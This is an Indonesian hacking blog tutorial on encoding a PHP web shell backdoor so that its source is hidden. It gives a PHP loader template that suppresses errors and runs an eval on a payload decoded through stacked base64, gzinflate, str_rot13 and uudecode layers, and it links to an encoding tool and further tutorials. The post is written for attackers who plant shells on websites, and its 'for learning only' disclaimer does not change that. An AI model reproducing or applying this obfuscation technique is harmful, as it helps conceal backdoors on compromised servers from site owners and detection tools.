[Tutorial] Cara Mudah Encode Shell Backdoor

[Tutorial] Cara Mudah Encode Shell Backdoor - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul [Tutorial] Cara Mudah Encode Shell Backdoor, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Kali ini saya akan share tutorial encode shell php. Ya, shell yang diencode memiliki banyak keunggulan. Selain kita menyembunyikan source asli dari shell tersebut, kita juga memperkecil ukuran dari shell.

Sekedar info, saya mendapatkan tutorial ini dari bang x’1n73ct . Dan di juga sudah mengijinkan jika tutorial ini disebarluaskan. 🙂

Oke langsung saja.


Bahan :

Shell mentah

Tools Encode – klik Disini


Pertama-tama, siapkan shell yang akan di encode. Copy semua script dari atas sampai bawah. 🙂

Lalu buka tools encode, pastekan scriptnya di kolom atas. Pilih jalur encodenya, sebagai contoh, saya pilih jalur : bsae64 – gzinflate – str_rot13 –convert_uu – gzinflate – base64 . Lalu klik menu encode.

Lihat SS :





Lalu hasil encode nantinya akan terlihat di kolom bawah.


Setelah itu, buka text editor [saya menggunakan notepad++], lalu copy script berikut :


<?php

@ini_set(‘output_buffering’,0); 

@ini_set(‘display_errors’, 0);


$convert = “ [shell yang diencode]  ”;


@eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($convert))))));


?>


Untuk [shell yang diencode], silahkan diisi dengan script hasil convert dari tools encode tadi.

Lalu tulisan yang saya beri warna biru, itu silahkan diisi sesuaid engan jalur encode yang dipilih.


Saya akan sedikit nejelaskan masing-masing fungsi script tersebut :


@ini_set(‘output_buffering’,0); 

Perintah ini berfungsi untuk meminimalkan buffering yang ada di file


@ini_set(‘display_errors’, 0);

Perintah ini berfungsi untuk menghilangkan error pada file


Dan setelah semua selesai, simpan dengan format .php . Contoh : shell.php

Coba test di localhost dan insya allah berhasil.

Shell JKT48 HACKER pun saya rilis setelah membaca tutorial ini.


Jika tutorial saya masih kurang, sobat bisa membaca tutorial dari bang x’1n73ct . Filenya berbentuk doc [dokumen].

Klik Disini Untuk Download


Di dalam file tersebut sudah ada tutorial encode shell dan juga tools encode yang bisa dijalankan di localhost.


Sekian tutorial dari saya. Semoga bermanfaat.

Special thanks to x’1n73ct




Yang mau copas harap kasih sumber ya. 🙂



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel [Tutorial] Cara Mudah Encode Shell Backdoor.
Terima kasih telah membaca artikel [Tutorial] Cara Mudah Encode Shell Backdoor, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "[Tutorial] Cara Mudah Encode Shell Backdoor"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel